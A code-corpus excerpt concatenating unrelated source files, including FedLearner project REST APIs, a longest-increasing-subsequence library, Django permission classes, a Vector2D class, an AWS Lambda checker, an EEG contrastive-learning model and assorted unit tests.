project.marker = None
self.assertIsNone(project.marker)
def test_project_add_vault(self):
project = api.Project(self.project_id)
vault = api.Vault(self.project_id,
self.vault_id)
project[vault.vault_id] = vault
self.assertEqual(vault, project[vault.vault_id])
def test_project_add_vault_invalid(self):
project = api.Project(self.project_id)
with self.assertRaises(errors.InvalidVault):
project[self.vault_id + '$'] = {}
def test_project_get_vault_invalid(self):
project = api.Project(self.project_id)
with self.assertRaises(errors.InvalidVault):
v = project[self.vault_id + '$']
def test_project_update_vault(self):
project = api.Project(self.project_id)
vaults = {
x: api.Vault(self.project_id, x) for x in [create_vault_name()]
}
project.update(vaults)
for k, vt in vaults.items():
self.assertEqual(vt, project[k])
def test_project_update_vault_invalid(self):
project = api.Project(self.project_id)
vaults = {
x: x for x in [create_vault_name()]
}
with self.assertRaises(TypeError):
project.update(vaults)
def test_repr(self):
project = api.Project(self.project_id)
serialized_project = repr(project)
| 2.75 | 3 |
web_console_v2/api/fedlearner_webconsole/project/apis.py | duanbing/fedlearner | 0 | 12767362 | # Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# pylint: disable=raise-missing-from
import re
from enum import Enum
from uuid import uuid4
from sqlalchemy.sql import func
from flask import request
from flask_restful import Resource, Api, reqparse
from google.protobuf.json_format import ParseDict
from fedlearner_webconsole.db import db
from fedlearner_webconsole.project.models import Project
from fedlearner_webconsole.proto.common_pb2 import Variable, StatusCode
from fedlearner_webconsole.proto.project_pb2 \
import Project as ProjectProto, CertificateStorage, \
Participant as ParticipantProto
from fedlearner_webconsole.project.add_on \
import parse_certificates, verify_certificates, create_add_on
from fedlearner_webconsole.exceptions \
import InvalidArgumentException, NotFoundException
from fedlearner_webconsole.rpc.client import RpcClient
from fedlearner_webconsole.utils.k8s_client import k8s_client
from fedlearner_webconsole.workflow.models import Workflow
_CERTIFICATE_FILE_NAMES = [
'client/client.pem', 'client/client.key', 'client/intermediate.pem',
'client/root.pem', 'server/server.pem', 'server/server.key',
'server/intermediate.pem', 'server/root.pem'
]
_URL_REGEX = r'(?:^((?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])(?:\.' \
r'(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3})(?::+' \
r'(\d+))?$)|(?:^\[((?:(?:[0-9a-fA-F:]){1,4}(?:(?::(?:[0-9a-fA-F]' \
r'){1,4}|:)){2,7})+)\](?::+(\d+))?|((?:(?:[0-9a-fA-F:]){1,4}(?:(' \
r'?::(?:[0-9a-fA-F]){1,4}|:)){2,7})+)$)'
class ErrorMessage(Enum):
PARAM_FORMAT_ERROR = 'Format of parameter {} is wrong: {}'
NAME_CONFLICT = 'Project name {} has been used.'
class ProjectsApi(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('name',
required=True,
type=str,
help=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'name', 'Empty'))
parser.add_argument('config',
required=True,
type=dict,
help=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'config', 'Empty'))
parser.add_argument('comment')
data = parser.parse_args()
name = data['name']
config = data['config']
comment = data['comment']
if Project.query.filter_by(name=name).first() is not None:
raise InvalidArgumentException(
details=ErrorMessage.NAME_CONFLICT.value.format(name))
if config.get('participants') is None:
raise InvalidArgumentException(
details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'participants', 'Empty'))
if len(config.get('participants')) != 1:
# TODO: remove limit after operator supports multiple participants
raise InvalidArgumentException(
details='Currently not support multiple participants.')
# exact configuration from variables
# TODO: one custom host for one participant
grpc_ssl_server_host = None
egress_host = None
for variable in config.get('variables', []):
if variable.get('name') == 'GRPC_SSL_SERVER_HOST':
grpc_ssl_server_host = variable.get('value')
if variable.get('name') == 'EGRESS_HOST':
egress_host = variable.get('value')
# parse participant
certificates = {}
for participant in config.get('participants'):
if 'name' not in participant.keys() or \
'domain_name' not in participant.keys():
raise InvalidArgumentException(
details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'participants', 'Participant must have name and '
'domain_name.'))
domain_name = participant.get('domain_name')
# Grpc spec
participant['grpc_spec'] = {
'authority':
egress_host or '{}-client-auth.com'.format(domain_name[:-4])
}
if participant.get('certificates'):
# If users use web console to create add-on,
# peer url must be given
if 'url' not in participant.keys():
raise InvalidArgumentException(
details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'participants', 'Participant must have url.'))
if re.match(_URL_REGEX, participant.get('url')) is None:
raise InvalidArgumentException('URL pattern is wrong')
current_cert = parse_certificates(
participant.get('certificates'))
success, err = verify_certificates(current_cert)
if not success:
raise InvalidArgumentException(err)
certificates[domain_name] = {'certs': current_cert}
if 'certificates' in participant.keys():
participant.pop('certificates')
new_project = Project()
# generate token
# If users send a token, then use it instead.
# If `token` is None, generate a new one by uuid.
config['name'] = name
token = config.get('token', uuid4().hex)
config['token'] = token
# check format of config
try:
new_project.set_config(ParseDict(config, ProjectProto()))
except Exception as e:
raise InvalidArgumentException(
details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'config', e))
new_project.set_certificate(
ParseDict({'domain_name_to_cert': certificates},
CertificateStorage()))
new_project.name = name
new_project.token = <PASSWORD>
new_project.comment = comment
# create add on
for participant in new_project.get_config().participants:
if participant.domain_name in\
new_project.get_certificate().domain_name_to_cert.keys():
_create_add_on(
participant,
new_project.get_certificate().domain_name_to_cert[
participant.domain_name], grpc_ssl_server_host)
try:
new_project = db.session.merge(new_project)
db.session.commit()
except Exception as e:
raise InvalidArgumentException(details=str(e))
return {'data': new_project.to_dict()}
def get(self):
# TODO: Not count soft-deleted workflow
projects = db.session.query(
Project, func.count(Workflow.id).label('num_workflow'))\
.join(Workflow, Workflow.project_id == Project.id, isouter=True)\
.group_by(Project.id)\
.all()
result = []
for project in projects:
project_dict = project.Project.to_dict()
project_dict['num_workflow'] = project.num_workflow
result.append(project_dict)
return {'data': result}
class ProjectApi(Resource):
def get(self, project_id):
project = Project.query.filter_by(id=project_id).first()
if project is None:
raise NotFoundException()
return {'data': project.to_dict()}
def patch(self, project_id):
project = Project.query.filter_by(id=project_id).first()
if project is None:
raise NotFoundException()
config = project.get_config()
if request.json.get('token') is not None:
new_token = request.json.get('token')
config.token = new_token
project.token = new_token
if request.json.get('variables') is not None:
del config.variables[:]
config.variables.extend([
ParseDict(variable, Variable())
for variable in request.json.get('variables')
])
# exact configuration from variables
grpc_ssl_server_host = None
egress_host = None
for variable in config.variables:
if variable.name == 'GRPC_SSL_SERVER_HOST':
grpc_ssl_server_host = variable.value
if variable.name == 'EGRESS_HOST':
egress_host = variable.value
if request.json.get('comment'):
project.comment = request.json.get('comment')
for participant in config.participants:
if participant.domain_name in\
project.get_certificate().domain_name_to_cert.keys():
_create_add_on(
participant,
project.get_certificate().domain_name_to_cert[
participant.domain_name], grpc_ssl_server_host)
if egress_host:
participant.grpc_spec.authority = egress_host
project.set_config(config)
try:
db.session.commit()
except Exception as e:
raise InvalidArgumentException(details=e)
return {'data': project.to_dict()}
class CheckConnectionApi(Resource):
def post(self, project_id):
project = Project.query.filter_by(id=project_id).first()
if project is None:
raise NotFoundException()
success = True
details = []
# TODO: Concurrently check
for participant in project.get_config().participants:
result = self.check_connection(project.get_config(), participant)
success = success & (result.code == StatusCode.STATUS_SUCCESS)
if result.code != StatusCode.STATUS_SUCCESS:
details.append(result.msg)
return {'data': {'success': success, 'details': details}}
def check_connection(self, project_config: ProjectProto,
participant_proto: ParticipantProto):
client = RpcClient(project_config, participant_proto)
return client.check_connection().status
def initialize_project_apis(api: Api):
api.add_resource(ProjectsApi, '/projects')
api.add_resource(ProjectApi, '/projects/<int:project_id>')
api.add_resource(CheckConnectionApi,
'/projects/<int:project_id>/connection_checks')
def _create_add_on(participant, certificate, grpc_ssl_server_host=None):
if certificate is None:
return
# check validation
for file_name in _CERTIFICATE_FILE_NAMES:
if certificate.certs.get(file_name) is None:
raise InvalidArgumentException(
details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
'certificates', '{} not existed'.format(file_name)))
try:
create_add_on(k8s_client, participant.domain_name, participant.url,
certificate.certs, grpc_ssl_server_host)
except RuntimeError as e:
raise InvalidArgumentException(details=str(e))
| 1.648438 | 2 |
longest_increasing_subsequence/_implementation.py | mCodingLLC/longest_increasing_subsequence | 7 | 12767363 | """Implementation of the longest increasing subsequence algorithm."""
import operator
from bisect import bisect_right, bisect_left
from typing import TypeVar, Optional, List, Any, Iterator, Sequence, Callable
T = TypeVar('T')
def longest_increasing_subsequence(seq: Sequence[T], strict=False, key: Callable = None) -> List[T]:
"""
Returns the longest increasing subsequence of the given sequence.
There may be other increasing subsequences of the same length.
>>> longest_increasing_subsequence([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
[0, 2, 6, 9, 11, 15]
>>> longest_increasing_subsequence([0, 0, 1, 2, 3, 2, 1, 0, 0])
[0, 0, 1, 2, 2]
>>> longest_increasing_subsequence([0, 0, 1, 2, 3], strict=True)
[0, 1, 2, 3]
>>> longest_increasing_subsequence(['A', 'B', 'CC', 'D', 'EEE'], key=len)
['A', 'B', 'D', 'EEE']
>>> "".join(longest_increasing_subsequence('aababbbdccddd'))
'aaabbbccddd'
:param seq: A sequence-like container of comparable objects.
:param strict: Whether the subsequence must be strictly increasing.
:param key: If not None, values in sequence are compared by comparing their keys.
:return: The longest increasing subsequence in seq as a list.
"""
return _longest_monotone_subsequence(seq, True, strict, key)
def longest_decreasing_subsequence(seq: Sequence[T], strict=False, key: Callable = None) -> List[T]:
"""
Returns the longest decreasing subsequence of the given sequence.
There may be other decreasing subsequences of the same length.
>>> longest_decreasing_subsequence([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
[12, 10, 9, 5, 3]
>>> longest_decreasing_subsequence([0, 0, 1, 2, 3, 2, 1, 0, 0])
[3, 2, 1, 0, 0]
>>> longest_decreasing_subsequence([0, 0, 1, 2, 3, 2, 1, 0, 0], strict=True)
[3, 2, 1, 0]
:param seq: A sequence-like container of comparable objects.
:param strict: Whether the subsequence must be strictly decreasing.
:param key: If not None, values in sequence are compared by comparing their keys.
:return: The longest decreasing subsequence in seq as a list.
"""
try:
return _longest_monotone_subsequence(seq, False, strict, key, True)
except TypeError:
pass
return _longest_monotone_subsequence(seq, False, strict, key, False)
def longest_increasing_subsequence_indices(seq: Sequence[T], strict=False, key: Callable = None) -> List[int]:
"""
Returns the indices of the longest increasing subsequence of the given sequence.
There may be other increasing subsequences of the same length.
>>> longest_increasing_subsequence_indices([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
[0, 4, 6, 9, 13, 15]
>>> longest_increasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0])
[0, 1, 2, 3, 5]
>>> longest_increasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0], strict=True)
[0, 2, 3, 4]
:param seq: A sequence-like container of comparable objects.
:param strict: Whether the subsequence must be strictly increasing.
:param key: If not None, values in sequence are compared by comparing their keys.
:return: A list of indices of the longest increasing subsequence in seq.
"""
return _longest_monotone_subsequence_indices(seq, True, strict, key)
def longest_decreasing_subsequence_indices(seq: Sequence[T], strict=False, key: Callable = None) -> List[int]:
"""
Returns the indices of the longest decreasing subsequence of the given sequence.
There may be other decreasing subsequences of the same length.
>>> longest_decreasing_subsequence_indices([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
[3, 5, 9, 10, 12]
>>> longest_decreasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0])
[4, 5, 6, 7, 8]
>>> longest_decreasing_subsequence_indices([0, 0, 1, 2, 3, 2, 1, 0, 0], strict=True)
[4, 5, 6, 7]
:param seq: A sequence-like container of comparable objects.
:param strict: Whether the subsequence must be strictly decreasing.
:param key: If not None, values in sequence are compared by comparing their keys.
:return: A list of indices of the longest decreasing subsequence in seq.
"""
try:
return _longest_monotone_subsequence_indices(seq, False, strict, key, True)
except TypeError:
pass
return _longest_monotone_subsequence_indices(seq, False, strict, key, False)
def _longest_monotone_subsequence(seq: Sequence[T], increasing=True, strict=False, key: Callable = None, assume_negatable=True) -> List[T]:
"""
Returns the a list of the longest increasing (respectively decreasing) subsequence of the given sequence.
There may be other increasing (respectively decreasing) subsequences of the same length.
This is not a public function, use a longest_increasing_* or longest_decreasing_* function instead.
:param seq: A sequence-like container of comparable objects.
:param increasing: Whether the subsequence should be increasing or decreasing.
:param strict: Whether the subsequence must be strictly monotone.
:param key: If not None, values in sequence are compared by comparing their keys.
:param assume_negatable: If True (the default), assume that negation (unary -) is defined and is order-reversing on objects or keys.
For non-negatable types, set this option to False.
:return: An iterator of indices of the longest monotone subsequence in seq.
"""
return [seq[idx] for idx in _longest_monotone_subsequence_indices_iter(seq, increasing, strict, key, assume_negatable)]
def _longest_monotone_subsequence_indices(seq: Sequence[T], increasing=True, strict=False, key: Callable = None, assume_negatable=True) -> List[int]:
"""
Gives a list of the indices of the longest increasing (respectively decreasing) subsequence of the given sequence.
There may be other increasing (respectively decreasing) subsequences of the same length.
This is not a public function, use a longest_increasing_* or longest_decreasing_* function instead.
:param seq: A sequence-like container of comparable objects.
:param increasing: Whether the subsequence should be increasing or decreasing.
:param strict: Whether the subsequence must be strictly monotone.
:param key: If not None, values in sequence are compared by comparing their keys.
:param assume_negatable: If True (the default), assume that negation (unary -) is defined and is order-reversing on objects or keys.
For non-negatable types, set this option to False.
:return: An iterator of indices of the longest monotone subsequence in seq.
"""
return list(_longest_monotone_subsequence_indices_iter(seq, increasing, strict, key, assume_negatable))
def _longest_monotone_subsequence_indices_iter(seq: Sequence[T], increasing=True, strict=False, key: Callable = None, assume_negatable=True) -> Iterator[int]:
"""
Yields the indices of the longest increasing (respectively decreasing) subsequence of the given sequence.
There may be other monotone subsequences of the same length.
This is not a public function, use a longest_increasing_* or longest_decreasing_* function instead.
:param seq: A sequence-like container of comparable objects.
:param increasing: Whether the subsequence should be increasing or decreasing.
:param strict: Whether the subsequence must be strictly monotone.
:param key: If not None, values in sequence are compared by comparing their keys.
:param assume_negatable: If True (the default), assume that negation (unary -) is defined and is order-reversing on objects or keys.
For non-negatable types, set this option to False.
:return: An iterator of indices of the longest monotone subsequence in seq.
"""
if not seq:
return (_ for _ in [])
idx_prev_longest: List[Optional[int]] = []
idx_min_of_len_plus1: List[int] = [] # the index of the smallest value ending a subsequence of a given length+1
val_min_of_len_plus1: List[Any] = [] # the smallest value ending a subsequence of a given length+1
bisect = bisect_right if not strict else bisect_left
key_fn = _choose_key_function(key, increasing, assume_negatable)
keys = seq if key_fn is None else map(key_fn, seq)
for i, curr_key in enumerate(keys):
len_longest_extendable = bisect(val_min_of_len_plus1, curr_key)
if len_longest_extendable == len(val_min_of_len_plus1):
idx_min_of_len_plus1.append(i)
val_min_of_len_plus1.append(curr_key)
elif curr_key < val_min_of_len_plus1[len_longest_extendable]:
idx_min_of_len_plus1[len_longest_extendable] = i
val_min_of_len_plus1[len_longest_extendable] = curr_key
idx_longest_extendable = idx_min_of_len_plus1[len_longest_extendable - 1] if len_longest_extendable else None
idx_prev_longest.append(idx_longest_extendable)
longest_subsequence_indices = _make_subsequence_indices(prev_indices=idx_prev_longest,
terminal_idx=idx_min_of_len_plus1[-1])
return longest_subsequence_indices
class _OrderReversed:
"""
A wrapper around any object that swaps its < and > operators (without touching the actual object).
>>> _OrderReversed(0) > _OrderReversed(1)
True
>>> repr(_OrderReversed(0))
'_OrderReversed(0)'
"""
__slots__ = ('obj',)
def __init__(self, o):
self.obj = o
def __lt__(self, other):
return self.obj > other.obj
def __gt__(self, other):
return self.obj < other.obj
def __repr__(self):
return f'{self.__class__.__name__}({self.obj!r})'
def _choose_key_function(key: Optional[Callable], increasing: bool, assume_negatable: bool) -> Optional[Callable]:
"""
Gives back the key function with its order optionally reversed. None represents the identity function.
>>> _choose_key_function(None, True, True) is None
True
>>> _choose_key_function(None, True, False) is None
True
>>> fn = _choose_key_function(None, False, True)
>>> fn(0) > fn(1)
True
>>> fn = _choose_key_function(None, False, False)
>>> fn(0) > fn(1)
True
>>> fn = _choose_key_function(len, True, False)
>>> fn("X") < fn("AA")
True
>>> fn = _choose_key_function(len, True, True)
>>> fn("X") < fn("AA")
True
>>> fn = _choose_key_function(len, False, False)
>>> fn("AA") < fn("X")
True
"""
if key is None:
if increasing:
key_fn = None
elif assume_negatable:
key_fn = operator.neg
else:
def key_fn(v):
return _OrderReversed(v)
else:
orig_key = key
if increasing:
key_fn = orig_key
elif assume_negatable:
def key_fn(v):
return -orig_key(v)
else:
def key_fn(v):
return _OrderReversed(orig_key(v))
return key_fn
def _make_reversed_subsequence_indices(prev_indices: List[Optional[int]], terminal_idx: int) -> Iterator[int]:
"""
Given a list of indices representing pointers to parent, and given a terminal pointer, yields indices from the terminal to the root.
>>> list(_make_reversed_subsequence_indices([None, 0, 0, 1, 2, 1], 5))
[5, 1, 0]
"""
idx: Optional[int] = terminal_idx
while idx is not None:
yield idx
idx = prev_indices[idx]
def _make_subsequence_indices(prev_indices: List[Optional[int]], terminal_idx: int) -> Iterator[int]:
"""
Given a list of indices representing pointers to parent, and given a terminal pointer, yields indices from the root to the terminal index.
>>> list(_make_subsequence_indices([None, 0, 0, 1, 2, 1], 5))
[0, 1, 5]
"""
return reversed(list(_make_reversed_subsequence_indices(prev_indices, terminal_idx)))
| 4.0625 | 4 |
tests/test_common.py | multiplechoice/workplace | 2 | 12767364 | <filename>tests/test_common.py<gh_stars>1-10
from jobs.common import decode_date_string, translate_month
from freezegun import freeze_time
def test_month_lookups():
assert translate_month("jan") == 1
assert translate_month("feb") == 2
assert translate_month("mars") == 3
assert translate_month("apr\u00edl") == 4
assert translate_month("ma\u00ed") == 5
assert translate_month("j\u00fan\u00ed") == 6
assert translate_month("j\u00fal\u00ed") == 7
assert translate_month("\u00e1g\u00fast") == 8
assert translate_month("sept") == 9
assert translate_month("okt") == 10
assert translate_month("n\u00f3v") == 11
assert translate_month("des") == 12
def test_unknown_month():
assert translate_month("January") is None
def test_decoding_whole_string_from_tvinna():
assert decode_date_string("27. apr\u00edl 2011") == "2011-04-27"
assert decode_date_string("30. \u00e1g\u00fast 2013") == "2013-08-30"
assert decode_date_string("9. ma\u00ed 2014") == "2014-05-09"
assert decode_date_string("10. j\u00fal\u00ed 2014") == "2014-07-10"
assert decode_date_string("3. n\u00f3v. 2014") == "2014-11-03"
assert decode_date_string("3. feb. 2015") == "2015-02-03"
assert decode_date_string("29. feb. 2016") == "2016-02-29"
@freeze_time("1st April, 2017")
def test_decoding_whole_string_from_mbl():
assert decode_date_string("1. ma\u00ed.") == "2017-05-01"
assert decode_date_string("10. ma\u00ed.") == "2017-05-10"
assert decode_date_string("16. apr.") == "2017-04-16"
def test_nonetype():
# sometimes dates are expected but are empty, meaning we pass a None to the decode function
assert decode_date_string(None) is None
@freeze_time("1st April, 2017")
def test_whitespace():
# need to ensure that the decoder can handle whitespace
assert decode_date_string(" 15. apríl") == "2017-04-15"
assert decode_date_string(" 15. apríl") == "2017-04-15"
assert decode_date_string(" 15. apríl ") == "2017-04-15"
| 2.390625 | 2 |
leasing/permissions.py | suutari-ai/mvj | 1 | 12767365 | from rest_framework import permissions
class MvjDjangoModelPermissions(permissions.DjangoModelPermissions):
"""Customized Django REST Framework DjangoModelPermissions
class that includes checking for the "view" permissions too.
"""
perms_map = {
"GET": ["%(app_label)s.view_%(model_name)s"],
"OPTIONS": [],
"HEAD": ["%(app_label)s.view_%(model_name)s"],
"POST": ["%(app_label)s.add_%(model_name)s"],
"PUT": ["%(app_label)s.change_%(model_name)s"],
"PATCH": ["%(app_label)s.change_%(model_name)s"],
"DELETE": ["%(app_label)s.delete_%(model_name)s"],
}
class PerMethodPermission(permissions.BasePermission):
"""Per method permission check
Permission where the required permissions can be configured
per method. Returns True if no permissions are configured.
If multiple permissions listed, the user must have all of
the permissions."""
perms_map = {
"GET": [],
"POST": [],
"PUT": [],
"PATCH": [],
"DELETE": [],
"OPTIONS": [],
}
def get_required_permissions(self, method, view):
"""Get required permissions for method and view combo
Given method and view, return the list of permission
codes that the user is required to have.
"""
perms_map = self.perms_map.copy()
if hasattr(view, "perms_map"):
perms_map.update(view.perms_map)
if method not in perms_map:
return []
return perms_map[method]
def has_permission(self, request, view):
if not request.user or not request.user.is_authenticated:
return False
required_perms = self.get_required_permissions(request.method, view)
return request.user.has_perms(required_perms)
class IsSameUser(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if not hasattr(obj, "user") or not obj.user:
return True
return obj.user == request.user
| 2.40625 | 2 |
src/vector2D.py | germtb/PyLight | 0 | 12767366 | from cmath import sqrt
from math import hypot
from utils import near_equal
class Vector2D:
def __init__(self, x, y):
self.x = x
self.y = y
def normalized(self):
modulus = sqrt(self.x * self.x + self.y * self.y)
return Vector2D(self.x / modulus, self.y / modulus)
def dot(self, point):
return self.x * point.x + self.y * point.y
def dif(self, point):
return Vector2D(self.x - point.x, self.y - point.y)
def inverse(self):
x = 0 if self.x == 0 else 1 / self.x
y = 0 if self.y == 0 else 1 / self.y
return Vector2D(x, y) * (1 / Vector2D(x, y).dot(self))
def close(self, point):
return near_equal(self.x, point.x) and near_equal(self.y, point.y)
def __repr__(self, *args, **kwargs):
return '(' + str(self.x) + ', ' + str(self.y) + ')'
def __str__(self):
return '(' + str(self.x) + ', ' + str(self.y) + ')'
def __eq__(self, other):
return self.close(other)
def __add__(self, other):
return type(self)(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return type(self)(self.x - other.x, self.y - other.y)
def __mul__(self, other):
return type(self)(self.x * other, self.y * other)
def distance_to(self, other):
return hypot((self.x - other.x), (self.y - other.y))
def __hash__(self, *args, **kwargs):
return hash(str(self))
import unittest
class Vector2DTests(unittest.TestCase):
def setUp(self):
self.v1 = Vector2D(1, 1)
self.v2 = Vector2D(2, 2)
self.v3 = Vector2D(3, 0)
def test_normalized(self):
self.assertEqual(self.v3.normalized(), Vector2D(1, 0))
def test_dot(self):
self.assertEqual(self.v1.dot(self.v2), 4)
def test_dif(self):
self.assertEqual(self.v1 - self.v2, Vector2D(-1, -1))
def test_inverse(self):
self.assertEqual(self.v3.inverse(), Vector2D(1 / 3, 0))
def test_mul(self):
self.assertEqual(self.v1 * 2, Vector2D(2, 2))
def test_sum(self):
self.assertEqual(self.v1 + self.v2, Vector2D(3, 3))
if __name__ == '__main__':
unittest.main()
| 3.4375 | 3 |
maestro/providers/aws/check_existence.py | tunein/Maestro | 12 | 12767367 | #External libs
import boto3
import sys
import json
import os
from botocore.exceptions import ClientError
#Establish our boto resources
client = boto3.client('lambda')
#This is only here for printing pretty colors
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def check(lambda_name):
'''
Checks to see if the lambda exists already, if it does, the user will be prompted to use 'update-code' action
args:
lambda_name: name of the lambda, retrieved from config file
'''
try:
function = client.get_function(FunctionName=lambda_name)
if len(function) > 0:
return True
else:
return False
except ClientError as error:
print(error.response)
def check_alias(lambda_name, alias):
'''
Checks our lambda to ensure the alias we want to import from exits
args:
lambda_name: name of the lambda we're checking
alias: name of the alias we're checking
'''
try:
alias = client.get_alias(FunctionName=lambda_name, Name=alias)
except ClientError as error:
print(error.response['Error']['Message'])
sys.exit(1)
else:
print("Alias located successfully!")
finally:
return True | 2.625 | 3 |
models/contrastive.py | TheoMoutakanni/TCC-EEG | 0 | 12767368 | <gh_stars>0
import numpy as np
from sklearn.metrics import balanced_accuracy_score
from skorch import NeuralNetClassifier
from skorch.helper import predefined_split
from skorch.callbacks import EpochScoring, ProgressBar, EarlyStopping
import torch
from torch import nn
import torch.nn.functional as F
from utils.skorch import EEGTransformer
class EncoderNet(nn.Module):
def __init__(self, feat_per_layer, n_channels, p_dropout=0.25, apply_batch_norm=False):
super().__init__()
self.num_features = feat_per_layer[-1]
batch_norm = nn.BatchNorm2d if apply_batch_norm else nn.Identity
feature_extractor = []
for i in range(len(feat_per_layer)):
feature_extractor.append(nn.Conv2d(in_channels=feat_per_layer[i - 1] if i > 0 else 1,
out_channels=feat_per_layer[i],
kernel_size=(1 if i > 0 else n_channels, 50)))
feature_extractor.append(nn.ReLU())
feature_extractor.append(batch_norm(feat_per_layer[i]))
feature_extractor.append(nn.Dropout(p_dropout))
feature_extractor.append(nn.MaxPool2d(
kernel_size=(1, 6), stride=(1, 6)))
self.feature_extractor = nn.Sequential(
*feature_extractor,
nn.AdaptiveAvgPool2d(1),
nn.Flatten(),
)
def forward(self, x):
"""
Input shape: (batch_size, n_channels, window_size)
Output shape: (batch_size, 1)
"""
x = x.unsqueeze(1)
x = self.feature_extractor(x)
return x
class ContrastiveModule(nn.Module):
def __init__(self, encoder):
super(ContrastiveModule, self).__init__()
self.encoder = encoder
self.num_features = self.encoder.num_features
self.fc = nn.Linear(in_features=self.num_features, out_features=2)
def forward(self, x):
"""
Input shape: (batch_size, 2, 1, nb_channels, window_size)
Output shape: (batch_size, 1)
"""
batch_size, _, nb_channels, window_size = x.shape
x = x.view(batch_size * 2, nb_channels, window_size)
x = self.encoder(x)
features = x
x = x.view(batch_size, 2, self.num_features)
x1, x2 = x[:, 0], x[:, 1]
x = torch.abs(x1 - x2)
x = self.fc(x)
return x, features
def train_(self, train_set, valid_set, lr=5e-4, batch_size=16, max_nb_epochs=20,
early_stopping_patience=5, early_stopping_monitor='valid_bal_acc'):
# Train using a GPU if possible
device = "cuda" if torch.cuda.is_available() else "cpu"
# Callbacks
train_bal_acc = EpochScoring(
scoring='balanced_accuracy', on_train=True, name='train_bal_acc',
lower_is_better=False)
valid_bal_acc = EpochScoring(
scoring='balanced_accuracy', on_train=False, name='valid_bal_acc',
lower_is_better=False)
early_stopping = EarlyStopping(
monitor=early_stopping_monitor, patience=early_stopping_patience,
lower_is_better='loss' in early_stopping_monitor)
callbacks = [
('train_bal_acc', train_bal_acc),
('valid_bal_acc', valid_bal_acc),
('progress_bar', ProgressBar()),
('early_stopping', early_stopping),
]
# Skorch model creation
skorch_net = EEGTransformer(
self.to(device),
criterion=torch.nn.CrossEntropyLoss,
optimizer=torch.optim.Adam,
optimizer__lr=lr,
train_split=predefined_split(valid_set),
batch_size=batch_size,
callbacks=callbacks,
device=device
)
# Training: `y` is None since it is already supplied in the dataset.
skorch_net.fit(train_set, y=None, epochs=max_nb_epochs)
return skorch_net
class ClassifierNet(nn.Module):
def __init__(self, encoder, p_dropout=0.4):
super(ClassifierNet, self).__init__()
# Auto-encoder
self.encoder = encoder
# Dense classifier
self.dropout = nn.Dropout(p_dropout)
self.dense1 = nn.Linear(encoder.num_features, encoder.num_features)
self.dense2 = nn.Linear(encoder.num_features, 5)
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
"""
Input shape: (batch_size, n_channels, window_size)
Output shape: (batch_size, 1)
"""
x = self.encoder(x)
x = self.dropout(x)
x = self.dense1(x)
x = F.relu(x)
x = self.dense2(x)
x = self.softmax(x)
return x
def train_and_test(
classifier_net, train_set, valid_set, test_set=None, lr=5e-4,
batch_size=16, max_nb_epochs=20, early_stopping_patience=5,
early_stopping_monitor='valid_bal_acc',
train_what="last", score_fn=balanced_accuracy_score):
"""
"""
if train_what == "last":
for param in classifier_net.encoder.parameters():
param.requires_grad = False
else: # train all
for param in classifier_net.encoder.parameters():
param.requires_grad = True
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Callbacks
train_bal_acc = EpochScoring(
scoring='balanced_accuracy', on_train=True, name='train_bal_acc',
lower_is_better=False)
valid_bal_acc = EpochScoring(
scoring='balanced_accuracy', on_train=False, name='valid_bal_acc',
lower_is_better=False)
early_stopping = EarlyStopping(
monitor='valid_bal_acc', patience=early_stopping_patience, lower_is_better=False)
callbacks = [
('train_bal_acc', train_bal_acc),
('valid_bal_acc', valid_bal_acc),
('progress_bar', ProgressBar()),
('early_stopping', early_stopping),
]
skorch_classifier = NeuralNetClassifier(
classifier_net,
criterion=torch.nn.CrossEntropyLoss,
optimizer=torch.optim.Adam,
# using valid_set for validation
train_split=predefined_split(valid_set),
optimizer__lr=lr,
batch_size=batch_size,
callbacks=callbacks,
device=device,
# Shuffle training data on each epoch
iterator_train__shuffle=True,
)
# Model training for a specified number of epochs. `y` is None as it is already
# supplied in the dataset.
skorch_classifier.fit(train_set, y=None, epochs=max_nb_epochs)
if test_set is not None:
X, y = zip(*list(iter(test_set)))
X = torch.stack(X)
y_pred = skorch_classifier.predict(X)
acc = score_fn(y_pred, y)
return skorch_classifier, acc
return skorch_classifier
| 2.203125 | 2 |
mangodb/test.py | 1005281342/learn | 1 | 12767369 | <reponame>1005281342/learn<filename>mangodb/test.py
"""
启动mongodb
mongod --config /usr/local/etc/mongod.conf
"""
import time
from pymongo import MongoClient
conn = MongoClient(host='127.0.0.1', port=27017)
test_db = conn['test']
test_table = test_db['test_table']
# test_table = test_db['test_table_city']
# res = test_table.find_one({"_id": "123"})
# print(res)
# if res:
# print("---")
# else:
# data = {
# "_id": "123"
# }
# test_table.save(data)
# # 增, 改
data = {
